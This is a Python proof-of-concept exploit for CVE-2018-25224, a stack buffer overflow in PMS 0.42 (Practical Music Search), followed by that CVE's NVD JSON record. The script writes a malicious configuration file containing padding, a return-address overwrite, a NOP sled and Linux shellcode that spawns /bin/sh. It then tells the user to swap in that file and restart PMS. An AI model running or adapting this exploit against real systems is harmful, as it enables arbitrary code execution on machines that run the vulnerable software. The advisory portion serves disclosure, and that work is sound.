CVE-2018-25224

import struct # PoC for CVE-2018-25224: PMS Stack-Based Buffer Overflow # This script generates a malicious configuration file to trigger the overflow. # Configuration: Adjust buffer offset based on target environment debugging BUFFER_SIZE = 256 # Example buffer size OFFSET = 260 # Offset to overwrite the return address # ROP Chain or Shellcode placeholder # In a real scenario, this would point to ROP gadgets to bypass DEP/NX # Example: Address of system() or a jmp esp gadget RET_ADDR = struct.pack("<I", 0xdeadbeef) # Payload construction # 1. Padding to reach the return address on the stack padding = b"A" * OFFSET # 2. Overwrite EIP/RIP with return address eip_overwrite = RET_ADDR # 3. NOP sled followed by shellcode (if executable stack is present) nop_sled = b"\x90" * 32 # Example shellcode (exec /bin/sh on Linux x86) shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" payload = padding + eip_overwrite + nop_sled + shellcode # Generate malicious configuration file # Assuming the vulnerable parameter is read into the stack buffer config_content = b"vulnerable_parameter = " + payload + b"\n" try: with open("pms_malicious.conf", "wb") as f: f.write(config_content) print("[+] Malicious configuration file 'pms_malicious.conf' created successfully.") print("[*] Replace the legitimate config file with this file and restart PMS to exploit.") except IOError as e: print(f"[-] Error creating file: {e}")

{"cve": {"id": "CVE-2018-25224", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:03.370", "lastModified": "2026-04-02T19:07:35.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PMS 0.42 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious values in the configuration file. Attackers can craft configuration files with oversized input that overflows the stack buffer and execute shell commands via return-oriented programming gadgets."}, {"lang": "es", "value": "PMS 0.42 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales no autenticados ejecutar código arbitrario al proporcionar valores maliciosos en el archivo de configuración. Los atacantes pueden crear archivos de configuración con entradas de tamaño excesivo que desbordan el búfer de pila y ejecutar comandos de shell a través de gadgets de programación orientada a retorno."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kimtore:practical_music_search:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.42", "matchCriteriaId": "89922C89-7254-407D-83EF-0F427C9ADA54"}]}]}], "references": [{"url": "https://pms.sourceforge.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/44426", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/pms-stack-based-buffer-overflow-via-configuration-file", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}